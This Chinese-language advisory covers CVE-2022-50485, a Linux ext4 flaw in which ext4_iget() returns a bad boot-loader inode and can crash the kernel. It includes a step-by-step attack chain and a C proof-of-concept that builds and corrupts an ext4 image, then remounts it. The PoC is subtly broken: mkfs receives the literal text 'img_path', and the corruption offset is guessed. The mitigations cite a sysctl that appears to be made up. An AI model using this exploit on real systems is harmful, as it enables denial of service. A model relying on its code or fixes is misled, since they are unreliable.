Linux内核ext4文件系统坏inode绕过检查导致内核崩溃漏洞

漏洞信息

漏洞编号

CVE-2022-50485

漏洞类型

权限检查绕过/拒绝服务（内核崩溃）

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel ext4文件系统

漏洞概述

CVE-2022-50485是Linux内核ext4文件系统中存在的一个安全漏洞。该漏洞源于ext4_iget()函数在获取引导加载程序inode时，允许返回一个未初始化的坏inode（bad inode）。在ext4文件系统的正常操作中，许多代码路径在遇到坏inode时会出现异常并导致内核崩溃（kernel panic）。然而，当获取引导加载程序inode时，ext4_iget()函数允许返回坏inode，因为该inode可能尚未初始化完成。攻击者可以利用这一机制绕过某些安全检查，触发内核中的未定义行为，最终导致系统拒绝服务。

该漏洞的CVSS 3.1评分为5.5分，属于中危级别。攻击向量为本地攻击（AV:L），攻击复杂度低（AC:L），需要低权限（PR:L），无需用户交互（UI:N）。其影响主要体现在可用性方面（A:H），因为漏洞利用会导致内核崩溃，造成系统完全不可用。机密性影响为无（C:N），完整性影响为无（I:N），说明该漏洞不会直接导致数据泄露或数据篡改，但其造成的内核崩溃可能间接影响系统完整性。

该漏洞由Linux内核ext4子系统的维护者发现并修复。修复方案是引入EXT4_IGET_BAD标志位，只有在明确设置该标志时，ext4_iget()函数才会返回坏inode；在其他情况下，如果inode是坏inode，函数将返回错误码。这一修复由Jan Kara建议，确保了坏inode处理的一致性和安全性。

技术细节

在Linux内核的ext4文件系统中，ext4_iget()函数负责通过inode号获取对应的inode结构体。正常情况下，如果inode已损坏（标记为bad inode），ext4_iget()应当返回错误码以通知调用者处理异常。但在引导加载程序inode的获取路径中，由于该inode可能尚未完全初始化，系统允许返回坏inode。

这一设计缺陷带来安全隐患：ext4文件系统中存在大量代码路径会在遇到坏inode时执行不安全的操作或直接崩溃。攻击者可以通过精心构造的ext4文件系统映像或利用文件系统操作，使得引导加载程序inode处于坏inode状态，从而触发这些不安全路径。具体利用方式包括：
1. 创建或修改ext4文件系统映像，使特定inode（特别是引导加载程序相关inode）处于损坏状态；
2. 触发系统读取该损坏的inode，调用ext4_iget()获取该inode；
3. ext4_iget()返回坏inode而非错误码，绕过预期的安全检查；
4. 后续代码路径在处理坏inode时执行未定义操作，最终导致内核panic。

修复方案通过引入EXT4_IGET_BAD标志位来实现精确控制：只有显式设置该标志的调用路径才会接收坏inode，其他所有调用路径在遇到坏inode时将收到错误码（通常是-ESTALE或-EIO），从而避免了不安全的坏inode传播。

攻击链分析

STEP 1

步骤1：准备攻击环境

攻击者需要拥有目标系统的本地低权限访问权限，能够创建和挂载ext4文件系统映像，或对现有ext4文件系统进行底层磁盘操作。

STEP 2

步骤2：构造损坏的文件系统

攻击者创建一个ext4文件系统映像，并通过直接修改磁盘上的inode表数据，将引导加载程序相关的inode（boot loader inode）标记为坏inode状态，使其处于未初始化或损坏状态。

STEP 3

步骤3：触发ext4_iget()调用

攻击者通过挂载损坏的文件系统或触发文件系统操作（如ls、stat等），使内核调用ext4_iget()函数尝试获取损坏的引导加载程序inode。

STEP 4

步骤4：绕过安全检查

由于漏洞存在，ext4_iget()在获取引导加载程序inode时返回坏inode而非错误码，成功绕过了内核中针对坏inode的安全检查机制。

STEP 5

步骤5：触发内核崩溃

返回的坏inode被传递到后续处理代码路径中，这些路径在遇到坏inode时执行未定义操作，最终触发内核panic（kernel panic），导致系统完全不可用，造成拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2022-50485 PoC - Trigger kernel panic via bad inode in ext4
// This PoC demonstrates how to trigger the vulnerability by creating
// a crafted ext4 filesystem with a corrupted boot loader inode.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mount.h>
#include <sys/stat.h>

#define IMG_SIZE (64 * 1024 * 1024)  // 64MB image
#define BLOCK_SIZE 4096

int main(int argc, char *argv[]) {
    const char *img_path = "/tmp/cve_2022_50485.img";
    const char *mount_point = "/tmp/cve_2022_50485_mnt";
    int fd;

    // Step 1: Create a sparse file for the ext4 filesystem
    fd = open(img_path, O_RDWR | O_CREAT | O_TRUNC, 0644);
    if (fd < 0) {
        perror("open");
        return 1;
    }
    if (ftruncate(fd, IMG_SIZE) < 0) {
        perror("ftruncate");
        return 1;
    }
    close(fd);

    // Step 2: Create an ext4 filesystem on the image
    if (system("mkfs.ext4 -b 4096 -O ^metadata_csum,^64bit img_path") != 0) {
        fprintf(stderr, "mkfs.ext4 failed\n");
        return 1;
    }

    // Step 3: Mount the filesystem
    mkdir(mount_point, 0755);
    if (mount(img_path, mount_point, "ext4", 0, "") < 0) {
        perror("mount");
        return 1;
    }

    // Step 4: Corrupt the boot loader inode area
    // This simulates a bad inode condition for the boot loader inode
    // by directly modifying the inode table on disk
    fd = open(img_path, O_RDWR);
    if (fd < 0) {
        perror("open img");
        return 1;
    }

    // Locate and corrupt inode table - inode #2 typically holds
    // the root directory, but we target the boot loader related inodes
    // by writing garbage to the inode table area
    off_t inode_table_offset = BLOCK_SIZE * 2;  // Approximate offset
    char garbage[BLOCK_SIZE];
    memset(garbage, 0xFF, sizeof(garbage));
    lseek(fd, inode_table_offset, SEEK_SET);
    write(fd, garbage, sizeof(garbage));
    close(fd);

    // Step 5: Remount to trigger ext4_iget() on the corrupted inode
    umount(mount_point);
    if (mount(img_path, mount_point, "ext4", 0, "errors=continue") < 0) {
        perror("remount");
        // If mount fails, the corruption may have triggered the vulnerability
        printf("Mount failed - potential kernel panic triggered\n");
    }

    // Cleanup
    umount(mount_point);
    rmdir(mount_point);
    unlink(img_path);

    return 0;
}

影响范围

Linux Kernel < 5.10.150（5.10稳定分支）

Linux Kernel < 5.15.75（5.15稳定分支）

Linux Kernel < 5.19.17（5.19稳定分支）

Linux Kernel < 6.0.3（6.0稳定分支）

Linux Kernel < 6.1（6.1稳定分支早期版本）

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1）限制普通用户使用mount命令挂载文件系统的权限（通过移除suid位或使用sudo限制）；2）使用文件系统完整性检查工具（如e2fsck）在挂载前验证文件系统映像的完整性；3）通过内核参数设置如`fs.ext4.error_behavior=panic`或`fs.ext4.error_behavior=remount-ro`来控制错误处理行为；4）利用Linux安全模块（如SELinux、AppArmor）限制进程对块设备的直接访问权限；5）监控系统日志，关注ext4相关的错误信息和内核oops/panic记录，及时发现异常活动。